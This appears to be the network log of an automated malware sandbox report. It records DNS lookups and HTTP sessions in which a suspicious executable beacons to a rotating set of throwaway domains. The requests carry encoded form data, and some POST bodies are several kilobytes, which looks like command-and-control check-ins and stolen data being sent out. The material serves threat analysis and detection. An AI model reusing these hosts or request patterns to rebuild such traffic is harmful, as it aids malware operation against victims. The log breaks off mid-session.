Apr 1, 2025 09:04:45.242784023 CEST | 192.168.2.4 | 1.1.1.1 | 0x4b0b | Standard query (0) | www.alplace.site | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:53.407294035 CEST | 192.168.2.4 | 1.1.1.1 | 0xe282 | Standard query (0) | www.cruycq.info | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:08.374314070 CEST | 192.168.2.4 | 1.1.1.1 | 0xc7a7 | Standard query (0) | www.elevatetextiles.net | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:16.562122107 CEST | 192.168.2.4 | 1.1.1.1 | 0xc924 | Standard query (0) | www.qzsazi.info | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:31.671436071 CEST | 192.168.2.4 | 1.1.1.1 | 0x25ab | Standard query (0) | www.l33900.xyz | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:45.436824083 CEST | 192.168.2.4 | 1.1.1.1 | 0xb0b3 | Standard query (0) | www.milp.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 1, 2025 09:03:18.225131035 CEST | 1.1.1.1 | 192.168.2.4 | 0x89f7 | No error (0) | www.031233226.xyz | 031233226.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 1, 2025 09:03:18.225131035 CEST | 1.1.1.1 | 192.168.2.4 | 0x89f7 | No error (0) | 031233226.xyz | - | 144.76.229.203 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:45.803064108 CEST | 1.1.1.1 | 192.168.2.4 | 0xc690 | No error (0) | www.031233226.xyz | 031233226.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 1, 2025 09:03:45.803064108 CEST | 1.1.1.1 | 192.168.2.4 | 0xc690 | No error (0) | 031233226.xyz | - | 144.76.229.203 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:51.849114895 CEST | 1.1.1.1 | 192.168.2.4 | 0xb676 | Server failure (2) | www.vipstargold.buzz | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:51.849191904 CEST | 1.1.1.1 | 192.168.2.4 | 0xb676 | Server failure (2) | www.vipstargold.buzz | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:52.957776070 CEST | 1.1.1.1 | 192.168.2.4 | 0x2514 | Server failure (2) | www.vipstargold.buzz | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:59.165592909 CEST | 1.1.1.1 | 192.168.2.4 | 0x7155 | No error (0) | www.woodsplace.net | woodsplace.net | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 1, 2025 09:03:59.165592909 CEST | 1.1.1.1 | 192.168.2.4 | 0x7155 | No error (0) | woodsplace.net | - | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:03:59.165592909 CEST | 1.1.1.1 | 192.168.2.4 | 0x7155 | No error (0) | woodsplace.net | - | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:13.486046076 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc34 | No error (0) | www.sigaque.today | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:28.039468050 CEST | 1.1.1.1 | 192.168.2.4 | 0xe6b8 | Name error (3) | www.kitculture.shop | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:37.178788900 CEST | 1.1.1.1 | 192.168.2.4 | 0x8e56 | Name error (3) | www.f66el619d.shop | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:45.339003086 CEST | 1.1.1.1 | 192.168.2.4 | 0x4b0b | Name error (3) | www.alplace.site | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:04:53.507210970 CEST | 1.1.1.1 | 192.168.2.4 | 0xe282 | No error (0) | www.cruycq.info | - | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:08.502291918 CEST | 1.1.1.1 | 192.168.2.4 | 0xc7a7 | Name error (3) | www.elevatetextiles.net | none | none | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:16.816375017 CEST | 1.1.1.1 | 192.168.2.4 | 0xc924 | No error (0) | www.qzsazi.info | - | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:31.922574997 CEST | 1.1.1.1 | 192.168.2.4 | 0x25ab | No error (0) | www.l33900.xyz | - | 162.218.30.235 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:45.624501944 CEST | 1.1.1.1 | 192.168.2.4 | 0xb0b3 | No error (0) | www.milp.store | - | 194.9.94.85 | A (IP address) | IN (0x0001) | false
Apr 1, 2025 09:05:45.624501944 CEST | 1.1.1.1 | 192.168.2.4 | 0xb0b3 | No error (0) | www.milp.store | - | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                                                            • www.031233226.xyz
                                                            • www.woodsplace.net
                                                            • www.sigaque.today
                                                            • www.cruycq.info
                                                            • www.qzsazi.info
                                                            • www.l33900.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49723 | 144.76.229.203 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
Timestamp | Bytes transferred | Direction | Data
Apr 1, 2025 09:03:18.423346996 CEST | 460 | OUT | GET /elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Connection: close
Host: www.031233226.xyz
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:03:18.600884914 CEST | 479 | IN | HTTP/1.1 404 Not Found
Date: Tue, 01 Apr 2025 07:03:18 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49724 | 13.248.213.45 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
Timestamp | Bytes transferred | Direction | Data
Apr 1, 2025 09:04:00.293005943 CEST | 730 | OUT | POST /cu04/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 203
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.woodsplace.net
Origin: http://www.woodsplace.net
Referer: http://www.woodsplace.net/cu04/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==
                                                            Apr 1, 2025 09:04:00.390646935 CEST | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.4 | 49725 | 13.248.213.45 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:02.938894033 CEST | 750 | OUT | POST /cu04/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.woodsplace.net
                                                            Origin: http://www.woodsplace.net
                                                            Referer: http://www.woodsplace.net/cu04/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=LgavgYig9OZ/oYXMBsc7Jqm9CavcjnNxMyNdRUO9Q+UWIYXOVbcLjW2KkXanzul3b7rdriuv8WLPM7X0kO3ttSCtY+4mxSreH3FatYG78yaP/UjxmxtzBzwT+IR0yWdFW8zQx2/2OphGieOgHbOmEGz2hKGDEXhwVrgIDxt3+Cy7AhfdgHNijjiRR28Z4xfweCjad4Nz9vRuhCrIGeWIaGU=
                                                            Apr 1, 2025 09:04:03.030935049 CEST | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.4 | 49726 | 13.248.213.45 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:05.578892946 CEST | 7007 | OUT | POST /cu04/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.woodsplace.net
                                                            Origin: http://www.woodsplace.net
                                                            Referer: http://www.woodsplace.net/cu04/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:04:05.678824902 CEST | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.4 | 49727 | 13.248.213.45 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:08.217838049 CEST | 461 | OUT | GET /cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.woodsplace.net
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:04:08.340334892 CEST | 379 | IN | HTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Tue, 01 Apr 2025 07:04:08 GMT
                                                            content-length: 258
                                                            connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk="}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.4 | 49728 | 104.21.32.1 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:13.597109079 CEST | 727 | OUT | POST /n61y/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.sigaque.today
                                                            Origin: http://www.sigaque.today
                                                            Referer: http://www.sigaque.today/n61y/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=MMN/RN5WFFkFfqoapumAAdKjRGOHuKzRaScw616XFzDZIjwicrnRCdboHeOalJVa6544XCLmrXf3D8KSTj/TKJ2E61oMV2xEQBlC59jwp0aqP9vmBRiZrytj/B8EF7/s/Uu62iYg98jAryi1gibcH+LTClVBODeFFdGYx79X3PXstFAzrkQcSkpqBPhMPjWBcg==
                                                            Apr 1, 2025 09:04:13.975892067 CEST | 1011 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:13 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1giYocPV4iM8un99%2BjzPQNTksSicE47h7r6M%2Bbma8nXqEYvqPTc6zEF%2FJHLabd8TS8fJkwYUTproC48GzrN%2FbVJhrp334Lm1Evb%2BtkEcRNBhEl%2BbNbwTjKhWgz2wMMqdn0dwTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b2d4a8842da-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=93653&min_rtt=93653&rtt_var=46826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Apr 1, 2025 09:04:13.975910902 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.4 | 49729 | 104.21.32.1 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:16.238420963 CEST | 747 | OUT | POST /n61y/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.sigaque.today
                                                            Origin: http://www.sigaque.today
                                                            Referer: http://www.sigaque.today/n61y/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=MMN/RN5WFFkFfK4aoNOAG9KgSGOH7azVaSQw60+HCBXZPDAidqnRBdboP+ObrpVd65kaXDHmrXL3D4GSTUTQLZ2GhloOImxEQBlC59fap0CqPOHmB0WG1CtkuB8EB7/o/UuY2gtL9+rAr2u1gzbfduLJMFUjfjiOc+js/oBG8rngsDNp6VxLAkNZcIo4CgrIHqM4aSi9F//zO1wdNvRsWm8=
                                                            Apr 1, 2025 09:04:16.604953051 CEST | 1009 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:16 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7ydtDJLN%2F8Tl4hlK3hVElUrHhf4x5JZ24Az1D%2F0frQHs3Htd6sazyOOA2QaUvO%2FX0Yn46HtzRWKutXBZuV8688doX4SGTppP0DFMXIoIq%2FyQ%2FaCN8HHwWSebU77P7GSw9CTqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b3dcb48438e-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=99818&min_rtt=99818&rtt_var=49909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Apr 1, 2025 09:04:16.605211973 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.4 | 49730 | 104.21.32.1 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:18.881954908 CEST | 7004 | OUT | POST /n61y/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.sigaque.today
                                                            Origin: http://www.sigaque.today
                                                            Referer: http://www.sigaque.today/n61y/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:04:19.255834103 CEST | 1008 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:19 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cggA0wmiT0jKnh6xIWBkdquHQN95AU13jnShtu5EqCnP4LpDy6FrTZNa6Kz%2FBywhAsuRztA89LlRQ1w%2BVe8S73S9p9FJubGSjopAfGdnsbNbK%2FYF%2FVAJC6Twhvq32RS7JA3WQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b4e4df88c47-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=98150&min_rtt=98150&rtt_var=49075&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Apr 1, 2025 09:04:19.255867004 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.4 | 49731 | 104.21.32.1 | 80 | 6292 | C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Apr 1, 2025 09:04:21.556158066 CEST | 460 | OUT | GET /n61y/?u8S0Yd=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.sigaque.today
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:04:21.919503927 CEST | 1031 | IN | HTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:21 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKnbKusfi5Uq1hNmMg%2BzEHhJaNjSL4c6KRIa6PV8rs3vnSSBJZ3EDxr4Y4OyG42xVFgtSPxtM9aj0K%2FkSpOQ3BfFYbrM%2FH%2B2bQqK3O%2FQmozbXWz0sUZiRCChMJNXoCe7IW3TSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b5f0bb81819-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=97244&min_rtt=97244&rtt_var=48622&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page --><
                                                            Apr 1, 2025 09:04:21.919523001 CEST | 336 | IN | Data Raw: 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74
                                                            Data Ascii: !-- a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome f
                                                            Apr 1, 2025 09:04:21.919533014 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49732 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:04:53.818047047 CEST | Bytes transferred: 721 | Direction: OUT | Data:
                                                            POST /0vwm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.cruycq.info
                                                            Origin: http://www.cruycq.info
                                                            Referer: http://www.cruycq.info/0vwm/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=vuxqMkMgT4qh9UfFVBI/2TtAXGMAzFJje5rZtvpEvAGoUHYnw3KEHyOdE/HeZ+703mnww5TyqmjvNuddMcq5aZpralm4J/3YhX4kKMKXhFLjG8FLbwwJVgY1DxzABgbv+4UURcwMWbdVMCUmHiZMNFPWr5/wxXAvtkEjIw8Fl/zKFDjLciG+9YZGrNzRcaXq9g==
                                                            Timestamp: Apr 1, 2025 09:04:54.638560057 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:04:54 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49733 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:04:56.647674084 CEST | Bytes transferred: 741 | Direction: OUT | Data:
                                                            POST /0vwm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.cruycq.info
                                                            Origin: http://www.cruycq.info
                                                            Referer: http://www.cruycq.info/0vwm/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: u8S0Yd=vuxqMkMgT4qhvkvFQmU/zztBLWMA5lILe53Ztu9UvyioXmonx1yEGyOdcvHXEu623mrCw9byqmHvNvtdNr26I5ptclneHf3YhX4kKMOxhFTjGMVLaToWUgY0ExzAFgbr+4VDRZQqWZVVMGQmGzZNDFPqv5+E5mkjqHkiLg9jjf3JEFuRNTnpvY912K6lRZqjmqsybXktKv0Ov+QjA95myqM=
                                                            Timestamp: Apr 1, 2025 09:04:57.658437014 CEST | Bytes transferred: 114 | Direction: IN | Data:
                                                            HTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:04:57 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49734 | Destination IP: 47.83.1.90 | Destination Port: 80 | PID: 6292 | Process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            Timestamp: Apr 1, 2025 09:04:59.477433920 CEST | Bytes transferred: 6998 | Direction: OUT | Data:
                                                            POST /0vwm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
